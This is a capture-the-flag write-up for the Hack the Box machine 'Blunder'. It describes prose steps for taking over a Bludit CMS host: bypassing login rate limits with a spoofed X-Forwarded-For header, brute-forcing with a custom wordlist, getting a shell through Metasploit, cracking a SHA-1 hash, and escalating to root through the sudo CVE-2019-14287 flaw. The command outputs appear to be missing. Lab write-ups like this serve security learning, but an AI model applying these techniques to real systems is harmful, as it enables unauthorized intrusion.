Blunder was an easy machine on Hack the Box. Here’s my take on solving the challenge

User

According to nmap, the webserver should be the only attack surface:

There seems to be some kind of blog on the site

Admin section suggests it’s Bludit CMS:

Addtionaly, source reveals CMS version:

It’s a version known to have a authenticated RCE vulnerability. In order to exploit it, one needs to get login credentials first.

The login panel is protected against bruteforcing creds and after few tries bans attacker based on their ip:

Fortunantely there’s a known bypass to this mechanism. The backend allows to override the ip by setting the X-Forwarded-For header. The CVE author also created a PoC script. After a few adjustments it was ready to use on the machine:

Unfortunately no password list seemed to work. More enumeration is required. File enumeration yields an interesting txt file:

It contains a potential login:

Even with this login the script didn’t find the right combination. Final step is to create a custom wordlist based on site content:

With this list, the script will finally reveal fergus password:

With these information it’s possible to use Metasploit module to get a shell:

There’s another version o bludit sitting in the /var/www folder.

It contains unsalted SHA-1 password hash of user Hugo:

Again, cracking the pass with bare rockyou is not enough. Fortunately, hashcat’s password variation rules allow to guess the right pass:

With these credentials it’s possible to grab a user flag:

Privlege escalation

Privlege escalation is actually really simple if one is up to date with recent CVEs. A sudo allows Hugo to run bash as any user but root:

A sudo is in version 1.8.25p1:

According to CVE 2019–14287 running sudo with negative UID should default to root and bypass above restriction: